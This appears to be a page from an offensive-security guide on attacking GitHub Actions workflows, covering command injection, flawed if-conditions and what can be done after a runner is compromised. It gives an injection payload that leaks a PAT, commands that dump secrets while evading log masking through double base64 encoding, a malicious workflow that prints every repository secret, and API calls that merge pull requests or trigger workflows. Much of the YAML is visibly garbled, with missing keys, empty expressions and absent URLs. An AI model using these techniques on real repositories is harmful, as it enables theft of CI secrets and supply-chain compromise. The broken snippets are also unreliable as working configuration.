GitHub Actions allows making workflows reusable using the workflow_call event. It allows calling a reusable workflow from another workflow by anyone who has access to this workflow:

    # third-party reusable workflow
    uses: octo-org/example-repo/.github/workflows/reusable-workflow.yml@main
    # or you can use a local reusable workflow
    # uses: .github/workflows/reusable-workflow.yml
      username: mona
      envPAT: ${{ secrets.envPAT }}
# reusable workflow
# octo-org/example-repo/.github/workflows/reusable-workflow.yml
        required: true
        type: string
        required: true

    runs-on: ubuntu-latest
      - run: |
          curl -H "Authorization: ${{ inputs.envPAT }}" "${{ inputs.username }}"

Reusable workflows are very similar to third-party actions. They are run in the context of a called workflow and allow defining inputs. Therefore, reusable workflows may misuse user-controlled input or context variables, which could lead to the same vulnerabilities that are described for workflows and third-party actions on this page.

The reusable workflow from the snippet above is vulnerable to command injection. If the username input variable will be controlled by an attacker, they can leak envPAT using the following payload as username:

"; cat /home/runner/work/_temp/$(xxd -r -p <<< 2a) | base64 -w0 | base64 -w0;#

Another example is the following workflow which checkouts a code from an incoming PR and runs npm install against it:


    name: Build and test
    runs-on: ubuntu-latest
        # check out incoming PR code
        - uses: actions/checkout@v2
            ref: refs/pull/${{ github.event.pull_request.number }}/merge
        - uses: actions/setup-node@v1
        # potentially untrusted code is being run during npm install or npm build
        # as the build scripts and referenced packages are controlled by the author of the PR
        - run: |
            npm install
            npm build


Vulnerable if-conditions

The if condition is used in a workflow file to determine whether a step should run. When an if conditional is true, the step will run. It can be useful from a security perspective as well. For example, the following if statement can be used to allow only pull requests from the base repository:

name: PR workflow

on: pull_request

    runs-on: ubuntu-latest
    if: ${{ github.event.pull_request.head.repo.full_name == github.repository }}
      - name: Do some work
        run: ...

However, these if conditions can be vulnerable and lead not to the behavior that is originally expected.

Incorrect comparison

Expressions implement the insensitive comparison that can be misused during protection implementation. For example, the following if condition will be true:

    if: 'test' == 'TEST'
      - name: Do some work
        run: ...

GitHub provides the contains() function that can be used in an if condition incorrectly. For example in the following example, an author has restricted the execution of the step to only bots using contains():

    if: contains(, '[bot]')
      - name: Do some work
        run: ...

However, this condition can be easily met by creating a new bot.

Labels on PRs

One approach to control the workflow execution is to use labels on pull requests. This is possible because a label on a pull request can only be set by a project member. As a result, it allows running a workflow only after a project member has reviewed a pull request and set an appropriate label:

name: Vulnerable workflow

on: pull_request_target

    runs-on: ubuntu-latest
    if: (github.event.action == 'labeled' && == 'approved') || (github.event.action != 'labeled' && contains(github.event.pull_request.labels.*.name, 'approved'))
      - name: Do some work
        run: ...

If a workflow uses pull_request or pull_request_target events with the synchronize action type, it will be triggered when the head repository is updated. Since new changes to a pull request do not remove labels, the if condition can be bypassed in the example above like this:

  1. Create a pull request with valid changes.

  2. Wait for the label to be set.

  3. Update the pull request with malicious code.

  4. The updates will trigger the workflow.

Misusing context variables

Using wrong context variables can cause if condition to always be true or false regardless of the situation. For example, the following if condition uses github.event.pull_request.base.repo.full_name instead of github.event.pull_request.head.repo.full_name variable to ignore pull requests from forks:

name: Vulnerable workflow

on: pull_request

    runs-on: ubuntu-latest
    # check base repo instead of head one
    # this condition is always true
    if: ${{ github.event.pull_request.base.repo.full_name == github.repository }}
      - name: Do some work
        run: ...

However, this condition will be always true. The same behaviour will be achieved if github.repository is used for comparing against the repository name:

name: Vulnerable workflow

on: pull_request

    runs-on: ubuntu-latest
    # github.repository contains the full repo name
    # this condition is always true
    if: github.repository == 'namespace/project'
      - name: Do some work
        run: ...

Skipping mandatory checks

A workflow can implement various types of checks during running. For example, it can check if an actor is a member of an organization or if they have write permissions for the current repository. This can be done using third-party actions or a custom validation based on the GitHub API. However, not all such actions interrupt execution if a check fails, some of them return a boolean value for subsequent verification. For instance, the following snippet shows a check for the presence of an actor in an org team:

- name: Fetch team member list
  uses: tspascoal/get-user-teams-membership@v1
    username: ${{ }}
    organization: <ORG>
    team: <TEAM>
- name: Is user not a team member?
  if: ${{ steps.checkUserMember.outputs.isTeamMember == 'false' }}
  run: exit 1

Nevertheless, the snippet above is vulnerable because there is no the id: field for the Fetch team member list step. As a result, ${{ steps.checkUserMember.outputs.isTeamMember == 'false' }} is always false. So, the fixed version looks like the following:

- name: Fetch team member list
  # id filed was missed in the vulnerable sample
  id: checkUserMember
  uses: tspascoal/get-user-teams-membership@v1
    username: ${{ }}
    organization: <ORG>
    team: <TEAM>
- name: Is user not a team member?
  if: ${{ steps.checkUserMember.outputs.isTeamMember == 'false' }}
  run: exit 1

Unclaimed or incorrect usernames

If the workflow uses something like this:

if: | == 'user1' || == 'user2' || == 'user3'

Make sure all these users exist as they may have already been deleted or misspelled.

The potential impact of a compromised runner workflow

Workflows triggered using the pull_request event have read-only permissions and have no access to secrets. However, these permissions differ for various event triggers such as issue_comment, issues or push, where you could attempt to steal repository secrets or use the write permission of the job's GITHUB_TOKEN.


Accessing secrets through environment variables

If secrets are passed to an environment variable, you can directly access them in the following ways:

# you can intentionally sent secrets to the logs with echo command
$ echo ${SOME_SECRET:0:4}; echo ${SOME_SECRET:4:200};
# or using base64 (you need encode twice to avoid auto-masking)
$ echo "${SOME_SECRET}" | base64 -w0 | base64 -w0
# you can exfiltrate secrets with curl command
$ curl "${SOME_SECRET}"
# use printenv to dump environament variables (you need encode twice to avoid auto-masking)
$ printenv | base64 -w0 | base64 -w0 
# same as printenv but via proc fs (you need encode twice to avoid auto-masking)
$ cat /proc/self/environ | base64 -w0 | base64 -w0

Accessing secrets from the run: step

If a secret is used directly in an expression ${{ }} in the run: block, like:

- run: |
    publisher ${{ secrets.PUBLISH_KEY }}
  shell: bash

The generated shell script will be stored on the disk in the /home/runner/work/_temp/ folder. This script contains the secret in plain text because GitHub Runner evaluates the expressions inside of ${{ }} and substitutes them with the resulting values before running the script in the run: block. Therefore, the secret can be accessed with the following command:

$ cat /home/runner/work/_temp/$(xxd -r -p <<< 2a) | base64 -w0 | base64 -w0

Note that this behavior is independent of shell settings.

Accessing secrets through rewriting third-party actions

If you have an arbitrary command execution in front of a third-party action that handles secrets:

- run: |
- uses: fakeaction/publish@v3
    key: ${{ secrets.PUBLISH_KEY }}

You can steal secrets by rewriting third-party action code. GitHub Runner checks out all third-party action repositories during the Set up step and saves them to the /home/runner/work/_actions/ folder. For example, fakeaction/publish@v3 will be checked out to the /home/runner/work/_actions/fakeaction/publish/v3/ folder. Therefore, you can rewrite a third-party action with a malicious one using command injection to access secrets.

The easiest way is to override the action.yml file with a composite action that leaks secrets:

name: 'Publish'
description: 'Fake publish action'
    description: 'Publish key'
    required: true

  using: "composite"
    - run: echo "${{ inputs.key }}" | base64 -w 0 | base64 -w 0
      shell: bash

Leaking repository and organization secrets by adding a malicious workflow

GitHub no longer allows modifying files in the .github/workflows folder or merging a branch from forks with changes in the .github/workflows folder using GITHUB_TOKEN. You need a personal access token with repo and workflow scopes to be able to add a malicious workflow.

Usually, non-default branches have no branch protection rules. If you have access to GITHUB_TOKEN with the pull_requests:write scope, you can add an arbitrary workflow to a non-default branch. Since the pull_request_target workflow in non-default branches can be triggered by a user, you can leak all repository and organization secrets using the following steps:

  1. Fork the target repo.

  2. Add a malicious pull_request_target workflow:

    name: Malicious workflow
    on: pull_request_target
      secrets: ${{ toJSON(secrets) }}
        runs-on: ubuntu-latest
          - run: echo $secrets | base64 -w0 | base64 -w0
  3. Create a pull request to a non-default branch.

  4. Merge the pull request using GITHUB_TOKEN with pull_requests:write scope:

    curl -X PUT -H "Accept: application/vnd.github+json" -H "Authorization: Bearer <GITHUB_TOKEN>" \<OWNER>/<REPO>/pulls/<PR_NUMBER>/merge
  5. After merging the pull request open a pull request to the non-default branch from the fork.

  6. Wait for the malicious workflow to complete.

  7. It will leak all secrets to the logs.

If GITHUB_TOKEN has the contents:write scope, you can create a new non-default branch using the following API request:

curl -X POST -H "Accept: application/vnd.github+json" -H "Authorization: Bearer <GITHUB_TOKEN>" \ \
  -d '{"ref":"refs/heads/featureA","sha":"aa218f56b14c9653891f9e74264a383fa43fefbd"}'

Exfiltrating secrets from a runner

An attacker can exfiltrate any stored secrets or other data from a runner. Actions and scripts may store sensitive data on the filesystem:



actions/checkout action by default stores the repository token in a .git/config file unless the persist-credentials: false argument is set



Azure/login action by default use the Azure CLI for login, that stores the credentials in $HOME/.azure folder






Exfiltrating secrets from memory

Any secrets that are used by a workflow are passed to the GitHub Runner at startup; therefore secrets are placed in the process's memory. You can try to exfiltrate secrets from the memory dump.

You can use the following script to dump the memory and find GITHUB_TOKEN:

Approving pull requests

You can grant write permissions on the pull requests API endpoint and use the API to approve a pull request. It can be used to bypass branch protection rules when a main branch requires 1 approval and does not require review from code owners.

For instance, if you can write to non-main branches of a repository, you can bypass the protection using the next steps:

  1. Create a branch and add the following workflow:

  1. Create a pull request.

  2. The pull request will require approval.

  3. Once the action is complete, github-actions bot will approve the changes.

  4. You can merge the changes to the main branch.

Modifying the contents of a repository

An attacker can use the GitHub API to modify repository content, including releases if the assigned permissions of GITHUB_TOKEN are not restricted.


Access cloud services via OpenID Connect

If a vulnerable workflow has the GITHUB_TOKEN with the id-token:write scope you can request the OIDC JWT ID token to access cloud resources.


Trigger workflow_dispatch workflows

GITHUB_TOKEN with the actions:write scope can be used to create a workflow dispatch event via API. It allows triggering workflows using the workflow_dispacth event and expanding the attack surface.

curl -i -X POST -H "Accept: application/vnd.github+json" -H "Authorization: Bearer <GITHUB_TOKEN>" \ \
  -d '{"ref":"main","inputs":{"name":"Mona the Octocat","home":"San Francisco, CA"}}'

In the request above, you can control workflow arguments using the inputs parameter. If a workflow does not properly handle data from the inputs context, you might get the command execution.

        description: 'API Token'
        required: true

    runs-on: ubuntu-latest
      # you can use the token parameter to inject arbitrary commands to the run: step
      - run: |
          curl -H "API-Token: ${{ inputs.token }}"


Trigger repository_dispatch workflows

GITHUB_TOKEN with the metadata:read and contents:read&write scopes can be used to create a repository dispatch event via API. It allows triggering workflows using the repository_dispatch event and expanding the attack surface.

curl -i -X POST -H "Accept: application/vnd.github+json" -H "Authorization: Bearer <GITHUB_TOKEN>"\ \
  -d '{"event_type":"on-demand-test","client_payload":{"unit":false,"integration":true}}'

In the request above, you can control workflow arguments using the client_payload parameter. If a workflow does not properly handle data from the github.event.client_payload context, you might get the command execution.

name: Manual

    types: [test_result]

    if: ${{ !github.event.client_payload.passed }}
    runs-on: ubuntu-latest
      # you can use the message parameter to inject arbitrary commands to the run: step
      - run: |
          echo ${{ github.event.client_payload.message }}


Last updated